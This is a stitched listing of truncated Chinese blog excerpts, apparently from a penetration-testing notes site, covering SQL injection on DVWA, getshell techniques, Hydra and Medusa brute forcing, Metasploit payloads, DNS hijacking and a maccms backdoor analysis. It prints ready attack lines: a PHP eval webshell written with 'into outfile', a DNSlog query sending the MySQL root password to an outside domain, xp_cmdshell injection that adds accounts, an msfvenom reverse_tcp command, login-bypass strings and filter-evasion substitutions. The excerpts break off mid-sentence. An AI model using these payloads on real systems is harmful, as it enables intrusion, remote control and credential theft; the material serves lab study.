作者:zero 本文为SQL基本注入的进阶文章,如有任何疑问请查看: SQL基本注入演示:https://www.cnblogs.com/anbus/p/10082452.html 导语: 利用SQL注入进行攻击来获取WebShell其实就是在向服务器写文件.(注意:这里我们需要得到网站的绝对路径)如何理解?引入余弦老哥的一句话: 黑客通过输入提交“特殊数据”,特殊数据在数据流的每个层处理,如果某个层没处理好,在输出的时候,就会出现相应层的安全问题. 也就是“输入输出”,余弦老哥举的这个例子就很…
题记: 本来今天想把白天刷的攻防世界Web进阶的做个总结,结果估计服务器抽疯环境老报错,然后想了下今天用到了SQL注入,文件上传等等,写写心得.相信很多朋友都一直想学好渗透,然后看到各种入门视频,入门书籍,零基础XXX,从入门到放弃,收藏即学完,东一块西一块的,本人也一样,不过当做攻防世界的web题时,梳理知识总结心得的时候发现虽然之前学的零散,但现在不断融汇贯通各个知识点不断串起来,由点到线再到面的感觉,总之和大家一起探索,共同进步!!! 内心OS:卷死其他小伙伴!!!努力学习,就会有收获!!…
VWA的Medium和Hight级别sql注入 一,Medium级 服务端代码 <?php if( isset( $_POST[ 'Submit' ] ) ) {      // Get input      $id = $_POST[ 'id' ];      $id = mysql_real_escape_string( $id ); // Check database      $query  = "SELECT first_name, last_name FROM users WH…
sql注入1,万能密码,自己写的网站,找到登录窗口,必须和数据库交互,往里插入构造的恶意代码,最后可以直接登录进去,不需要账号和密码,输入的恶意代码成为万能密码,后端拼接的sql语句,SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';用户登录的地方没有处理,可以输入用户名 admin' or 1=1#,使用’单引号闭合注释符号:# -- %25 %2d%2d --+在输入:admin' and1=1#admin'…
今天主要针对mysql常用注入语句进行测试. 测试环境与工具: 测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.. 渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103 首先我们介绍下DVWA和Burpsuite,DVWA这是一个php+mysql平台构建的预置web常见漏洞的渗透练习平台.能够帮助web应…
phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-priv没设置为空或指定的文件夹可以利用,写入木马,select"<?php @eval($_POST[s]);?>" into outfile "var/www/html/xx.php" 利用日志文件getshell,mysql大于5.0版本会创建日志文件,…
pydictor,强大的密码生成工具,可以合并密码字典,词频统计,去重,枚举数字字典生成字典python3 pydictor.py -base d --len 4 4 生成纯数字4位密码python3 pydictor.py -base L --len 1 4 -o name.txt 生成1-4位纯字母字典,长度为1-4位,输出名字文件为 name.txtpython3 pydictor.py -extend F:\工具\pydictor\ex.txt --level 3 --len 3 10…
本文由云+社区发表 0x00 前言 干白盒审计有小半年了,大部分是业务上的代码,逻辑的复杂度和功能模块结构都比较简单,干久了收获也就一般,有机会接触一个成熟的产品(vtiger CRM)进行白盒审计,从审计的技术难度上来说,都比公司内的那些业务复杂得多,而真正要提高自己技术水平,更应该看的也是这些代码. vtiger CRM是一个客户关系管理系统. 0x01 分析整体结构 https://www.vtiger.com/open-source-crm/download-open-source/代码…
该文章仅供学习,利用方法来自网络文章,仅供参考 the-backdoor-factory-master(后门工制造厂)原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload. 测试靶机环境,win7系统,wechat(微信)2.6.8 靶机ip:192.168.190.129 目标:利用the-backdoor-factory-master对微信自己的dll动态连接文件植入后门,等微信运行之后,反弹…
sunny.exe clientid 隧道ID route -n 查看网关netstat -rn 查看网关 DNS劫持ettercap用来内网渗透测试使用,可以嗅探内网,DNS劫持等攻击1,在攻击者电脑上,搭建web服务器2,终端打开ettercap的DNS文件,/etc/ettercap/etter.dns,在其中添加欺骗的A记录和PTR记录3,输入ettercap -G打开ettercap工具图形化界面4,开始主机扫描,在sniff选项下,选择 unified sniffing,选择需要嗅探…
Medusa(美杜莎)暴力破解使用 该文章仅供学习,利用方法来自网络文章,仅供参考 一.简介 medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些. 二,语法参数 medusha [-h host主机 或 -H file主机文件] [-u username 用户名 或 -U file用户名字典…
使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是综合利用工具,使用Ruby开发,使用方便 msfconsole进入工具 MSF,依赖postgresql数据库,在使用MSF前要开启数据库 msfvenom:生成木马msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5…
sqlmap参数--file-read,从数据库服务器中读取文件--file-write,--file-dest,把文件上传到数据库服务器中 dnslog平台的学习和它在盲注中的应用1,判断注入点2,测试网站对DNSlog提供的url是否解析SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'))…
使用xp_cmdshell需要堆叠注入,http://192.168.190.148/less-1.asp?id=1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --使用xp_cmdshell添加账户,http://192.168.190.148/less-1.asp?id=1';exec master..xp_cmdshell…
mongodb命令删除文档,db.集合名.remove({键:值})更新文档,db.集合名.update({被更新的对象},{$set:{要更新的内容}}),默认只更新检测到的第一条文档更新全部匹配到的文档,db.集合名.update({被更新的对象},{$set:{更新的内容}},{multi :ture}) mongodb的大于小于等于,{1:1},冒号小于,{0:{$lt:1}},0小于1小于或等于,{0:{$lte:1}},0小于或等于1大于{1:{$gt:0}},1大于0大于或等于{1…
mysql导出数据1,通过工具如phpmyadmin,navicat等2,mysqldump -u -p 库名 > /数据库文件, mysqldump -u -p 库名 表名 > /表数据文件3,select 字段 from 表名 into outfile “文件”mysql 5.5以后首次从数据库中都暗处文件,数据库会运行secure-file-priv 安全机制,会限制导出文件, 查看该安全项的值: show global variables like '%secure_file_priv…
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识.理解.学习. 这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦. 如果在阅读中有任何问题都可以与我邮件联系(contact@x0day.me) 0x01 在kali中使用metasploit 在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录了.这一点比bt5要…
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具.Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程.所有工具都共享一个请求,并能处理对应的HTTP 消息.持久性.认证.代理.日志.警报. 使用靶机DVWA里的爆破关进行学习,DVWA难度设置为low 1,Sniper(狙击手) 该模式就是添加一个参数,加载响应的pyload之后一个个进行尝试爆破,如果添加了两个参数,那么就会在第一个参数使用字典爆破结束之后,对第二个参数进行一个个爆破 设置好代理之后…
mysql常用命令mysql -u用户名 -p,登录方式也称为,二进制方式exit 退出mysql 查看mysql版本select version(); 查看mysql所有数据库show datebases;大于5.0版本的mysql都会有information_schema,存放当前所有数据库信息,如登录信息,权限设置,安全设置等 选择某个数据库use 库名; 修改密码知道原密码修改,mysql -u -p进入mysql低版本 5.0 5.1 5.5等有user表下有password字段的 u…
nmap参数-sT,使用tcp全连接的方式 ,扫描过程需要三次握手,建立链接,则说明端口开放,扫描速度慢-sS,使用syn的数据包去检测,接收到ACK说明端口开放-sN,null扫描,发出去的数据包不设置任何的标识位上述扫描端口默认扫描都是1-1000-p,指定端口-sV,探测服务版本>重定向符号,可以将扫描结果保存到指定文件-oX 目录路径,将结果保存为xml格式文件-A,获取目标服务器所有的详细结果,全面扫描-O,探测目标主机操作系统类型--script,使用脚本探测漏洞情况--script…
使用BP和Hydra爆破相关的服务hydra:九头蛇,开源的功能强大的爆破工具,支持的服务有很多,使用hydra爆破c/s结构的服务,使用bp爆破web登陆窗口爆破需要的几个条件,爆破工具+字典字典:就是一些用户名或口令,弱口令.使用社工软件生成的集合 BP爆破步骤,单向爆破1,拦截数据包,将拦截的数据包发送到intruder模块2,在intruder模块,进入positions选项卡下,点击clear取消自动选择的爆破对象,然后选中需要爆破的值,点击add,例如password=xxx,在爆破…
一,使用Hydra爆破ubuntu的SSH服务 输入命令,hydra -l root -P password.txt 192.168.20.128 ssh Hydra工具,基本参数说明 -l:指定用户名,一般用来在知道用户名的情况下,爆破密码使用 -L:指定用户名字典文件,在不知道用户名的情况下使用字典文件爆破 -p:指定密码,一般用在知道一个密码,不确定用户名情况下使用 -P:指定密码字典文件,在不知道密码的情况下使用密码字典爆破 -s:指定端口,如果扫描发现服务端口不是默认的情况下可以指定扫…
python -m SimpleHTTPServer gedit 文本编辑器 apache2 默认配置文件目录:/etc/apache2/apache2默认首页源码: /var/www/html mysql数据库sudo mysql -uroot -pshow databases; 查看所有数据库select user(); 查看当前用户 mysql默认配置文件:/etc/mysql/mysql.conf.d/mysql.cnfmysql远程连接:编辑文件,注释掉 bind-address 12…
一.搭建WordPress的cms网站管理系统 1,下载Wordpress cms源码,下载地址:https://wordpress.org/download/ 2,将源码解压到phpstudy目录下的WWW文件夹下 3,启动phpstudy的apache服务和mysql服务 4,打开打开phpmyadmin,进入Mysql数据库管理界面,点击数据库,创建名为wordpress的数据库 5,打开浏览器,访问127.0.0.1/wordpress,进入到wordpress的安装界面,首先选择语言,…
DNS服务器,域名解析服务器,端口默认53,UDP协议传输,服务器作业,将域名转成ip,将ip转成域名 sql server默认端口:1433,MSSQL是sql server简写 netstat -ano | findstr 端口号:查询系统是否有开启某端口 ftp.ichunqiu.com.:完全合格域名,"."根域 ,"com"顶级域,'qichunqiu'二级域,“ftp”主机名 域名查询过程,找浏览器缓存-->查询自己的hosts文件-->本地…
一,apache web服务器安装 1,sudo apt-get install apache2 2,systemctl status apache2,检查apache2是否开启 #开启.关闭和重启apache2服务器命令 systemctl start apache2 :开启 systemctl stop apache2 :关闭 systemctl restart apache2 : 重启 打开浏览器,url填写127.0.0.1或本机ip地址,尝试访问自己的web页面,查看是否可以看到apa…
等价字符 空格:%20,+,(),%0a,%09,%a0,%0b,%0c,%0d,/**/等 =:like,regexp,liker,<>,! =等 and:&& or:xor &,^,||(and或or可以相互替换,只有两边条件不同) 逗号:盲注中from 1 for 1,联合查询中A join B mysql特性 =,:=,@ mysql中“=”为等于的意思,只有在update set时为赋值的意思 “:=”为复制的意思 在mysql中变量不需要定义,利用@变量名就…
maccms10后门分析下载网址,是假官网http://www.maccmsv10.com/download.htmlMaccms10基于php+mysql的maccms,是苹果的内容管理,方便使用,功能良好,适用范围广后门所在路径maccms10\extend\Qcloud\Sms\Sms.php maccms10\extend\upyun\src\Upyun\Api\Format.phpecho pack('H*',$str);<?phperror_reporting(E_ERROR); /…
header("Content-Type:text/html;charst="utf-8")设置头部信息,解决编码问题setcookie("loginString",$value,0,"/","localhost",false,true);参数说明第一个参数指定cookie的标识符key第二个参数指定cookie的值第三个参数指定cookie生存期第四个参数指定,该cookie的作用域,将在Cookie上可用的服务器…
php面向对象基础->调用符号构造函数construct,主要用来创建对象时初始化对象,为成员变量赋初始值,总与new运算符一起使用在创建对象的语句中 析构函数destructor,与构造函数相反,当对象结束其生命周期时,系统自动执行析构函数,__destruct 继承,php使用关键字extends来继承一个类,php不支持多继承,class child extends parent{代码} 属性的访问控制,php对属性或方法的访问控制,是通过在前面添加关键字public公有,protecte…